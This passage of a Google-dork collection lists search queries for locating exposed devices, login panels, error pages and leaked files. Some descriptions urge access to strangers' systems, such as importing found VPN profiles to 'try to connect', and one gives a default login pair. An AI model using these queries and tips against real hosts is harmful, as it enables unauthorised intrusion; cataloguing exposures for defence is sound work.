[[title]inurl:/en/help.cgi "ID=*"[title]]
[[descr]Aficio printers (this search locates the help pages)[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fen%2Fhelp.cgi+%22ID%3D*%22[url]]
[[dork]inurl:/en/help.cgi "ID=*"[dork]]
[end][1151]]
[[start][1152]
[[title]intitle:jdewshlp "Welcome to the Embedded Web Server!"[title]]
[[descr]HP Officejet help page. Remove "help.html" for main page.[descr]]
[[url]http://www.google.com/search?q=intitle%3Ajdewshlp+%22Welcome+to+the+Embedded+Web+Server%21%22[url]]
[[dork]intitle:jdewshlp "Welcome to the Embedded Web Server!"[dork]]
[end][1152]]
[[start][1153]
[[title]"display printer status" intitle:"Home"[title]]
[[descr]Xerox Phaser printers.[descr]]
[[url]http://www.google.com/search?q=%22display+printer+status%22+intitle:%22Home%22&filter=0[url]]
[[dork]"display printer status" intitle:"Home"[dork]]
[end][1153]]
[[start][1155]
[[title]inurl:JPGLogin.htm[[title]]
[[descr]webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3AJPGLogin.htm[url]]
[[dork]inurl:JPGLogin.htm[dork]]
[end][1155]]
[[start][1156]
[[title]intitle:"Welcome to Windows Small Business Server 2003"[title]]
[[descr]Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763).[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Welcome+to+Windows+Small+Business+Server+2003%22&num=100[url]]
[[dork]intitle:"Welcome to Windows Small Business Server 2003"[dork]]
[end][1156]]
[[start][1157]
[[title]intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"[title]]
[[descr]This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22OfficeConnect+Cable%2FDSL+Gateway%22+intext%3A%22Checking+your+browser%22[url]]
[[dork]intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"[dork]]
[end][1157]]
[[start][1160]
[[title]intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"[title]]
[[descr]phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account databse without authorization.[descr]]
[[url]http://www.google.com/search?q=intext%3A%22Powered+by+phpBB+2.0.13%22+inurl%3A%22cal_view_month.php%22%7Cinurl%3A%22downloads.php%22[url]]
[[dork]intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"[dork]]
[end][1160]]
[[start][1162]
[[title]Netscape Application Server Error page[[title]]
[[descr]This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.
Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1162]]
[[start][1163]
[[title]"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"[title]]
[[descr]you can find many servers infected with sql injection[descr]]
[[url]http://www.google.com/search?q=%22%5BSQL+Server+Driver%5D%5BSQL+Server%5DLine+1:+Incorrect+syntax+near%22+-forum+-thread+-showthread&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:[url]]
[[dork]"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" -forum -thread -showthread[dork]]
[end][1163]]
[[start][1165]
[[title]intext:"vbulletin" inurl:admincp[[title]]
[[descr]vBulletin Admin Control Panel[descr]]
[[url]http://www.google.com/search?q=intext%3A%22vbulletin%22+inurl%3Aadmincp&btnG=Search&hl=en&lr=[url]]
[[dork]intext:"vbulletin" inurl:admincp[dork]]
[end][1165]]
[[start][1167]
[[title]intitle:"inc. vpn 3000 concentrator"[title]]
[[descr]This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief.[descr]]
[[url]http://www.google.com/search?q=intitle:%22inc.+vpn+3000+concentrator%22&num=30&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]intitle:"inc. vpn 3000 concentrator"[dork]]
[end][1167]]
[[start][1168]
[[title]Winamp Web Interface[[title]]
[[descr]Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.
Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface.[descr]]
[[url]http://www.google.com/search?q=%22About+Winamp+Web+Interface%22+intitle%3A%22Winamp+Web+Interface%22&btnG=Search[url]]
[[dork]"About Winamp Web Interface" intitle:"Winamp Web Interface"[dork]]
[end][1168]]
[[start][1169]
[[title]intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail"[title]]
[[descr]Some version of ilohamail are vulnerable.[descr]]
[[url]http://www.google.com/search?q=intitle%3Ailohamail+intext%3A%22Version+0.8.10%22+%22Powered+by+IlohaMail%22&btnG=Search[url]]
[[dork]intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail"[dork]]
[end][1169]]
[[start][1172]
[[title]intitle:ilohamail "Powered by IlohaMail"[title]]
[[descr]IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features.[descr]]
[[url]http://www.google.com/search?q=intitle%3Ailohamail+%22Powered+by+IlohaMail%22&btnG=Search[url]]
[[dork]intitle:ilohamail "Powered by IlohaMail"[dork]]
[end][1172]]
[[start][1179]
[[title]intitle:"NeroNET - burning online"[title]]
[[descr]NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. Well they were smart enough to convienently place the default password located within the softwares manual.[descr]]
[[url]http://www.google.com/search?q=intitle%3ANeroNET+-+burning+online[url]]
[[dork]intitle:NeroNET - burning online[dork]]
[end][1179]]
[[start][1181]
[[title]"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php[[title]]
[[descr]PHP error with a full web root path disclosure[descr]]
[[url]http://www.google.com/search?q=%22Parse+error:+parse+error,+unexpected+T_VARIABLE%22+%22on+line%22+filetype:php[url]]
[[dork]"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php[dork]]
[end][1181]]
[[start][1182]
[[title]"MacHTTP" filetype:log inurl:machttp.log[[title]]
[[descr]MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access.
[descr]]
[[url]http://www.google.com/search?q=%22MacHTTP%22+filetype%3Alog+inurl%3Amachttp.log[url]]
[[dork]"MacHTTP" filetype:log inurl:machttp.log[dork]]
[end][1182]]
[[start][1184]
[[title]ext:plist filetype:plist inurl:bookmarks.plist[[title]]
[[descr]These Safari bookmarks that might show very interesting info about a user's surfing habits[descr]]
[[url]http://www.google.com/search?q=ext%3Aplist+filetype%3Aplist+inurl%3Abookmarks.plist[url]]
[[dork]ext:plist filetype:plist inurl:bookmarks.plist[dork]]
[end][1184]]
[[start][1185]
[[title]ext:ics ics[[title]]
[[descr]ICalender Fileder that can contain a lot of useful information about a possible target.[descr]]
[[url]http://www.google.com/search?q=ext%3Aics+ics[url]]
[[dork]ext:ics ics[dork]]
[end][1185]]
[[start][1186]
[[title]intitle:"Default PLESK Page"[title]]
[[descr]Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.
The default page is an indication that no configuration has been done (yet) for the domain[descr]]
[[url]http://www.google.com/search?q=intitle:%22Default%20PLESK%20Page%22&filter=0[url]]
[[dork]intitle:"Default PLESK Page"[dork]]
[end][1186]]
[[start][1187]
[[title]intitle:"Zope Help System" inurl:HelpSys[[title]]
[[descr]By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Zope+Help+System%22+inurl%3AHelpSys[url]]
[[dork]intitle:"Zope Help System" inurl:HelpSys[dork]]
[end][1187]]
[[start][1189]
[[title]ext:jbf jbf[[title]]
[[descr]There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file.[descr]]
[[url]http://www.google.com/search?q=ext%3Ajbf+jbf[url]]
[[dork]ext:jbf jbf[dork]]
[end][1189]]
[[start][1190]
[[title]"Please use Netscape 2.0 or enhance !!" -site:dlink.com -site:ovislink.com.tw[[title]]
[[descr]A search for some HTML code used in a variety of D-link network devices (webcams and such).[descr]]
[[url]http://www.google.com/search?q=%22Please+use+Netscape+2.0+or+enhance+!!%22+-site:dlink.com+-site:ovislink.com.tw&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"Please use Netscape 2.0 or enhance !!" -site:dlink.com -site:ovislink.com.tw[dork]]
[end][1190]]
[[start][1197]
[[title]intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"[title]]
[[descr]Just another logon page search, this one is for SFX®, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library. [descr]]
[[url]http://www.google.com/search?q=intitle:%22SFXAdmin+-+sfx_global%22+%7C+intitle:%22SFXAdmin+-+sfx_local%22+%7C+intitle:%22SFXAdmin+-+sfx_test%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"[dork]]
[end][1197]]
[[start][1198]
[[title] intitle:"Welcome to the Advanced Extranet Server, ADVX!"[title]]
[[descr]Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Welcome%20to%20the%20Advanced%20Extranet%20Server,%20ADVX!%22[url]]
[[dork]intitle:"Welcome to the Advanced Extranet Server, ADVX!"[dork]]
[end][1198]]
[[start][1199]
[[title]inurl:cgi-bin inurl:bigate.cgi[[title]]
[[descr]Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work.[descr]]
[[url]http://www.google.com/search?q=inurl:cgi-bin+inurl:bigate.cgi&num=100&hl=en&lr=&c2coff=1&safe=off&filter=1[url]]
[[dork]inurl:cgi-bin inurl:bigate.cgi[dork]]
[end][1199]]
[[start][1200]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1200]]
[[start][1201]
[[title]ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"[title]]
[[descr]Various Online Devices>Xerox (*Centre)
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&q=ext%3Adhtml+intitle%3A%22document+centre%7C%28home%29%22+OR+intitle%3A%22xerox%22[url]]
[[dork]ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"[dork]]
[end][1201]]
[[start][1203]
[[title]ext:DBF DBF[[title]]
[[descr]Dbase DAtabase file. Can contain sensitive data like any other database.[descr]]
[[url]http://www.google.com/search?q=ext%3ADBF+DBF&hl=en&lr=[url]]
[[dork]ext:DBF DBF[dork]]
[end][1203]]
[[start][1204]
[[title]ext:CDX CDX[[title]]
[[descr]Visual FoxPro database index[descr]]
[[url]http://www.google.com/search?q=ext:CDX+CDX&hl=en&lr=&start=0&sa=N[url]]
[[dork]ext:CDX CDX[dork]]
[end][1204]]
[[start][1205]
[[title]ext:ccm ccm -catacomb[[title]]
[[descr]Lotus cc:Mail Mailbox file[descr]]
[[url]http://www.google.com/search?q=ext:ccm+ccm+-catacomb[url]]
[[dork]ext:ccm ccm -catacomb[dork]]
[end][1205]]
[[start][1206]
[[title]ext:DCA DCA[[title]]
[[descr]IBM DisplayWrite Document Content Architecture Text File[descr]]
[[url]http://www.google.com/search?q=ext:DCA+DCA&hl=en&lr=&start=0&sa=N[url]]
[[dork]ext:DCA DCA[dork]]
[end][1206]]
[[start][1207]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1207]]
[[start][1208]
[[title]intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"[title]]
[[descr]Squid error messages, most likely from reverse proxy servers. [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22ERROR%3A+The+requested+URL+could+not+be+retrieved%22+%22While+trying+to+retrieve+the+URL%22+%22The+following+error+was+encountered%22[url]]
[[dork]intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered"[dork]]
[end][1208]]
[[start][1209]
[[title]!Host=*.* intext:enc_UserPassword=* ext:pcf[[title]]
[[descr]Some people actually keep their VPN profiles on the internet...omg... Simply donwload the pcf file, import it in your Cisco VPN client and try to connect[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%21Host%3D*.*+intext%3Aenc_UserPassword%3D*++ext%3Apcf&btnG=Search[url]]
[[dork]!Host=*.* intext:enc_UserPassword=* ext:pcf[dork]]
[end][1209]]
[[start][1210]
[[title]intitle:"Welcome To Your WebSTAR Home Page"[title]]
[[descr]This is the default page for the WebSTAR (Macintosh) web server (Headers say --> Server: WebSTAR NetCloak). [descr]]
[[url]http://www.google.com/search?q=intitle:%22Welcome+To+Your+WebSTAR+Home+Page%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Welcome To Your WebSTAR Home Page"[dork]]
[end][1210]]
[[start][1211]
[[title]"Powered by DWMail" password intitle:dwmail[[title]]
[[descr]What is DWmail™?: DWmail™ is an 'intelligent' Web based email application written in the scripting language, PHP. DWmail™ allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email.[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+DWMail%22+password+intitle%3Adwmail&btnG=Search[url]]
[[dork]"Powered by DWMail" password intitle:dwmail[dork]]
[end][1211]]
[[start][1212]
[[title]inurl:gnatsweb.pl[[title]]
[[descr]GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases. [descr]]
[[url]http://www.google.com/search?q=inurl%3Agnatsweb.pl[url]]
[[dork]inurl:gnatsweb.pl[dork]]
[end][1212]]
[[start][1213]
[[title]intitle:"site administration: please log in" "site designed by emarketsouth"[title]]
[[descr]Real Estate software package, with the admin login screen[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1213]]
[[start][1214]
[[title]welcome.to phpqladmin "Please login" -cvsweb[[title]]
[[descr]phpQLAdmin is a web administration tool for LDAP similar to phpMyAdmin. [descr]]
[[url]http://www.google.com/search?q=welcome.to+phpqladmin++%22Please+login%22+-cvsweb&btnG=Search[url]]
[[dork]welcome.to phpqladmin "Please login" -cvsweb[dork]]
[end][1214]]
[[start][1215]
[[title]intitle:"YALA: Yet Another LDAP Administrator"[title]]
[[descr]YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose program
The goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22YALA%3A+Yet+Another+LDAP+Administrator%22&btnG=Search[url]]
[[dork]intitle:"YALA: Yet Another LDAP Administrator"[dork]]
[end][1215]]
[[start][1216]
[[title]intitle:open-xchange inurl:login.pl[[title]]
[[descr]Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities. [descr]]
[[url]http://www.google.com/search?q=intitle:open-xchange+inurl:login.pl[url]]
[[dork]intitle:open-xchange inurl:login.pl[dork]]
[end][1216]]
[[start][1217]
[[title]intitle:"Document title goes here" intitle:"used by web search tools" " example of a simple Home Page"[title]]
[[descr]IBM Http Server (AS/400)[descr]]
[[url]http://www.google.com/search?q=intitle:%22Document+title+goes+here%22+intitle:%22used+by+web+search+tools%22+%22+example+of+a+simple+Home+Page%22&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Document title goes here" intitle:"used by web search tools" " example of a simple Home Page"[dork]]
[end][1217]]
[[start][1218]
[[title]intitle:"WorldClient" intext:"© (2003|2004) Alt-N Technologies."[title]]
[[descr]MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs.
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22WorldClient%22+intext%3A%22%C2%A9+%282003%7C2004%29+Alt-N+Technologies.%22[url]]
[[dork]intitle:"WorldClient" intext:"© (2003|2004) Alt-N Technologies."[dork]]
[end][1218]]
[[start][1219]
[[title]intitle:"Freifunk.Net - Status" -site:commando.de[[title]]
[[descr]Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. some guys from freifunk.net have modified it for their needs.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Freifunk.Net+-+Status%22+-site%3Acommando.de[url]]
[[dork]intitle:"Freifunk.Net - Status" -site:commando.de[dork]]
[end][1219]]
[[start][1220]
[[title]intitle:index.of WEB-INF[[title]]
[[descr]Finds java powered web servers which have indexing enabled on their config directory[descr]]
[[url]http://www.google.com/search?q=%0D%0Aintitle%3Aindex.of+WEB-INF[url]]
[[dork]
intitle:index.of WEB-INF[dork]]
[end][1220]]
[[start][1221]
[[title]inurl:"port_255" -htm[[title]]
[[descr]Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.
http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22port_255%22+-htm&btnG=Google+Search[url]]
[[dork]inurl:"port_255" -htm[dork]]
[end][1221]]
[[start][1222]
[[title]intitle:"SWW link" "Please wait....."[title]]
[[descr]Zyxel Zywall[descr]]
[[url]http://www.google.com/search?q=intitle:%22SWW+link%22+%22Please+wait.....%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"SWW link" "Please wait....."[dork]]
[end][1222]]
[[start][1249]
[[title]ext:nbe nbe[[title]]
[[descr]This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format.[descr]]
[[url]http://www.google.com/search?q=ext%3Anbe+nbe[url]]
[[dork]ext:nbe nbe[dork]]
[end][1249]]
[[start][1250]
[[title]inurl:server.cfg rcon password[[title]]
[[descr]Counter strike rcon passwords, saved in the server.cfg. [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1250]]
[[start][1251]
[[title]intitle:"myBloggie 2.1.1..2 - by myWebland"[title]]
[[descr]myBloggie is affected by multiple vulnerabilities.
http://www.securityfocus.com/bid/13507[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22myBloggie+2.1.1..2+-+by+myWebland%22[url]]
[[dork]intitle:"myBloggie 2.1.1..2 - by myWebland"[dork]]
[end][1251]]
[[start][1252]
[[title]intext:"powered by EZGuestbook"[title]]
[[descr]HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database
http://www.securityfocus.com/bid/13543/info/
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1252]]
[[start][1253]
[[title]inurl::2082/frontend -demo[[title]]
[[descr]This allows you access to CPanel login dialogues/screens.
[descr]]
[[url]http://www.google.com/search?q=inurl%3A%3A2082%2Ffrontend+-demo[url]]
[[dork]inurl::2082/frontend -demo[dork]]
[end][1253]]
[[start][1255]
[[title]intitle:"osTicket :: Support Ticket System"[title]]
[[descr]osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.
http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=3882
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22osTicket+%3A%3A+Support+Ticket+System%22+&btnG=Search[url]]
[[dork]intitle:"osTicket :: Support Ticket System" [dork]]
[end][1255]]
[[start][1256]
[[title]intext:"Powered by: Adobe PrintGear" inurl:admin[[title]]
[[descr]Printers equipped with Adobe's PrintGear technology
Adobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low.
[descr]]
[[url]http://www.google.com/search?q=intext%3A%22Powered+by%3A+Adobe+PrintGear%22+inurl%3Aadmin+&btnG=Search[url]]
[[dork]intext:"Powered by: Adobe PrintGear" inurl:admin [dork]]
[end][1256]]
[[start][1257]
[[title]intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password[[title]]
[[descr]AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording.
Besides the web interface it also offers an ftp server.
[descr]]
[[url]http://www.google.com/search?q=%0D%0Aintitle:%22---+VIDEO+WEB+SERVER+---%22+intext:%22Video+Web+Server%22+%22Any+time+%26+Any+where%22+username+password+&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password [dork]]
[end][1257]]
[[start][1271]
[[title]inurl:start.htm?scrw=[[title]]
[[descr]VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.
=)[descr]]
[[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DVXA,DVXA:2005-16,DVXA:en&q=inurl%3Astart%2Ehtm%3Fscrw%3D[url]]
[[dork]inurl:start.htm?scrw=[dork]]
[end][1271]]
[[start][1272]
[[title]intitle:"Welcome to 602LAN SUITE *"[title]]
[[descr]The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Welcome+to+602LAN+SUITE+*%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Welcome to 602LAN SUITE *"[dork]]
[end][1272]]
[[start][1273]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1273]]
[[start][1274]
[[title]intitle:"InterJak Web Manager"[title]]
[[descr]A router device by Uroam (formerly FilaNet), with email and VPN possibilities.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22InterJak+Web+Manager%22&btnG=Search[url]]
[[dork]intitle:"InterJak Web Manager"[dork]]
[end][1274]]
[[start][1275]
[[title]inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0"[title]]
[[descr]Simple PHP Blog is vulnerable to mutiple attacks:
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full Path disclosures
B. XSS in search.php
C. Critical Information dislosures
http://www.securityfocus.com/archive/1/395994[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1275]]
[[start][1276]
[[title]intitle:"SSHVnc Applet"OR intitle:"SSHTerm Applet" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com[[title]]
[[descr]SSHTerm Applet en SSHVnc Applet pages.[descr]]
[[url]http://www.google.com/search?q=intitle:%22SSHVnc+Applet%22OR+intitle:%22SSHTerm+Applet%22+-uni-klu.ac.at+-net/viewcvs.py+-iphoting.iphoting.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"SSHVnc Applet"OR intitle:"SSHTerm Applet" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com[dork]]
[end][1276]]
[[start][1279]
[[title]"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!" -site:webblernet.nl -site:ihackstuff.com -sit[[title]]
[[descr]Speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now.[descr]]
[[url]http://www.google.com/search?q=%22To+view+the+Web+interface+of+the+SpeedTouch,+JavaScript+must+be+supported+and+enabled+on+your+browser!%22+-site:webblernet.nl+-site:ihackstuff.com+-site:blogspot.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!" -site:webblernet.nl -site:ihackstuff.com -site:blogspot.com[dork]]
[end][1279]]
[[start][1280]
[[title](intitle:"502 Proxy Error")|(intitle:"503 Proxy Error") "The proxy server could not handle the request" -topic -mail -4suite -list -site:geocrawler.co[[title]]
[[descr]A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance.
[descr]]
[[url]http://www.google.com/search?q=%28intitle%3A%22502+Proxy+Error%22%29%7C%28intitle%3A%22503+Proxy+Error%22%29+%22The+proxy+server+could+not+handle+the+request%22+-topic+-mail+-4suite+-list+-site%3Ageocrawler.com+-site%3Aelitesecurity.org&btnG=Search[url]]
[[dork](intitle:"502 Proxy Error")|(intitle:"503 Proxy Error") "The proxy server could not handle the request" -topic -mail -4suite -list -site:geocrawler.com -site:elitesecurity.org[dork]]
[end][1280]]
[[start][1281]
[[title]intitle:"Dell *" inurl:port_0[[title]]
[[descr]oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. (Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Dell+*%22+inurl%3Aport_0&btnG=Google+Search[url]]
[[dork]intitle:"Dell *" inurl:port_0[dork]]
[end][1281]]
[[start][1282]
[[title]intext:"powered by Hosting Controller" intitle:Hosting.Controller[[title]]
[[descr]Description:
==============
Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.
The HC has its own complete billing solution which is tightly integrated within Control Panel & does all the invoicing & billing.
Vuln:
======
A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:
The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.
More on Vuln/Exploit
====================
http://securitytracker.com/alerts/2005/May/1014071.html[descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22powered+by+Hosting+Controller%22+intitle%3AHosting.Controller+&filter=0[url]]
[[dork]intext:"powered by Hosting Controller" intitle:Hosting.Controller [dork]]
[end][1282]]
[[start][1283]
[[title]intitle:"PacketShaper Customer Login"[title]]
[[descr]PacketShaper Login.
Provides login access for PacketShaper Customers.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22PacketShaper+Customer+Login%22+&btnG=Google+Search[url]]
[[dork]intitle:"PacketShaper Customer Login" [dork]]
[end][1283]]
[[start][1284]
[[title]( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")[[title]]
[[descr]Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet.[descr]]
[[url]http://www.google.com/search?q=(+intitle:%22PacketShaper+Login%22)%7C(intitle:%22PacketShaper+Customer+Login%22)&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")[dork]]
[end][1284]]
[[start][1285]
[[title]inurl:Citrix/MetaFrame/default/default.aspx[[title]]
[[descr]MetaFrame Presentation Server[descr]]
[[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3ACitrix%2FMetaFrame%2Fdefault%2Fdefault.aspx&btnG=Search[url]]
[[dork]inurl:Citrix/MetaFrame/default/default.aspx[dork]]
[end][1285]]
[[start][1286]
[[title]inurl:exchweb/bin/auth/owalogon.asp[[title]]
[[descr]Outlook Web Access Login POrtal[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Aexchweb%2Fbin%2Fauth%2Fowalogon.asp&btnG=Google+Search[url]]
[[dork]inurl:exchweb/bin/auth/owalogon.asp[dork]]
[end][1286]]
[[start][1290]
[[title]inurl:/SUSAdmin intitle:"Microsoft Software Update Services"[title]]
[[descr]Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.
